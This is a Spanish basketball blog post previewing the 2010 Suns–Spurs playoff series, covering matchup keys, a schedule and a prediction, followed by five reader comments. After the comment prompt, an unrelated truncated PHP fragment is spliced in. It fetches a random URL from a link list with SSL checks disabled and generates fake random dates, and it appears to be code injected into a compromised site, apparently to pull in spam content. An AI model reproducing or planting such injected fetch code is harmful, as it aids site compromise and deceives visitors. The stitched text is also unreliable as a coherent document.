Análisis Phoenix Suns vs San Antonio Spurs

03 de May de 2010 por txusma

Regular: 2-1 Suns

Suns: 110.2 P. Favor (1º) – 105.3 P.Contra (27º)
Spurs: 101.4 P.Favor (14) – 96.3 P.Contra (8º)

Esta será la cuarta vez desde 2003 que se verán las caras Phoenix y San Antonio en post-temporada y si algo ha caracterizado a estos partidos es una intensidad que ha acabado conviertiendo el choque en un clásico. ¿Quién no recuerda la eliminatoria de hace 3 años, con la nariz sangrante de Nash, las declaraciones de Amare acusando a Bowen y Ginobili de “sucios” o la sanción a Diaw y el mismo Stoudamire al saltar a la cancha después de un encontranazo entre Horry y Nash al final del cuarto partido? ¿O el triplazo de Duncan en el primer partido de la primera ronda del año siguiente que llevaba el partido a la prórroga y que acabó con victoria tejana? Los Suns tienen mucho de lo que vengarse.

Ambos equipos llegan plenos de moral tras sus buenas victorias de primera ronda, sobretodo los Spurs que se han deshecho de unos Mavs que llegaron a sonar incluso para anillo hace unas semanas. A Duncan y Ginobili se les ha unido George Hill y un Richard Jefferson que parece que despierta en el momento justo. Tony Parker sale desde el banco dotando al equipo de muchísima profundidad. En los Suns, Jason Richardson ha explotado elevando sus registros hasta en 6 puntos muy beneficiado por su escaso desgaste en la defensa ante la baja de Roy. Esta vez no podrá descansar todo lo que le gustaría. La gran duda en los Suns es el estado físico de Steve Nash que se ha perdido algún entrenamiento por culpa de una lesión en la cadera.

Claves de la eliminatoria:

– El tempo: No son exactamente las mismas plantillas que en pasados enfrentamientos pero la estrategia se repite. Si los Suns pueden correr e imponer su ritmo tendrán mucho ganado. Por lo contrario, si los Spurs pueden frenar a Nash y compañía y pausar el juego serán ellos los que tendrán más oportunidades.

– El outsider: ¿Podrá mantener Jason Richardson el nivel de la primera ronda? Como ya hemos comentado, ante los Blazers no se cansó nada defendiendo pero ahora tendrá delante a Manu Ginobili. Una posibilidad es que sea Grant Hill el que defienda al argentino y Richardson se encargue de Jefferson, guardando energías para el ataque.

– El otro outsider: Si el nivel de Richardson ha sorprendido qué decir del de George Hill. El jugador de segundo año se ha hecho con la titularidad desplazando a Parker al banco lo que dota a los Spurs de un banquillo temible. Además, si los Suns se ponen a correr con un equipo pequeño, los Spurs pueden sacar un Parker – Hill – Ginobili y seguirles la corriente.

– La defensa a Duncan: Si los Suns ya ejecutaron diversas defensas dobles sobre Lamarcus Aldridge, ¿qué harán para parar al mejor ala-pívot de la historia? Seguramente seguirán con la misma táctica y podrían recibir un buen refuerzo para hacerlo porque Robin Lopez, que ha tenido muy buenos partidos esta campaña, podría volver para esta serie. Cualquier cosa mejora a Jarron Collins que está saliendo de titular ahora mismo.

– El tiro exterior: Clave en los Suns. De su acierto dependerán muchas de las oportunidades de victoria.

Agenda:
– P1: Lunes, 3 de mayo a las 4h30 (Hora española)
– P2: Miércoles, 5 de mayo a las 3h00
-P3: Viernes, 7 de mayo a las 3h30
-P4: Domingo, 9 de mayo a las 2h00

Pronóstico: 2-4. Los Spurs robarán un partido en Arizona.

Comenta

5 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Yo añadiría otra clave… la historia/precedentes.

    Moralmente los Spurs tienen mucho ganado contra Phoenix desde antes del salto inicial. Ese es el único motivo por el que la mayoría de analistas dan como favorito al equipo que no cuenta con la ventaja campo.
    Tampoco me parecen los Suns un ejemplo de consistencia mental… quizás si lograran focalizar las ganas que les tienen a los Spurs…

    No hay cosa que me gustara más que ver una actuación mítica de Nash en esta serie… y que le dedicara la victoria a la memoria del mamonazo de Bowen

      Citar

  2. MagicJohnson32 dice:
    #2

    Pues yo apuesto por los Suns en 7 partidos.

      Citar

  3. Mariano dice:
    #3

    Yo apuesto a los Spurs en 6 partidos!

    Con Manu, Tony y Tim como en sus mejores epocas..

    y Bowen en la tribuna gritando cada anotacion xD jaja

    Grande Bruce “Lee” Bowen, te extrañamos mucho.

      Citar

  4. NBA LAKERS BLOG dice:
    #4

    Es cierto lo de Duncan. Una buena defensa a Stoudamire parece frenarlo definitivamente, sin embargo a Timmy ni por más de que coloques al defensor más joven y activo será fácil frenarlo. Será una interesantísima serie, con muchos factores importantes a seguir de cerca.

    Te espero en nuestro blog de los Lakers 😉

    Un abrazo!

    -NM-

      Citar

  5. luigi_sal dice:
    #5

    q buen empiece de suns y de nash en particular! menos mal q andaba dolorido, les ha colocado 33 pts y 10 asists. aunq parker q no es manco le ha hecho 26. interesante, interesante. los dos big threes respondiendo -nash, stat y richardson por un lado y duncan, ginobili y parker por otro-, jeje. go suns go! beat spurs!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>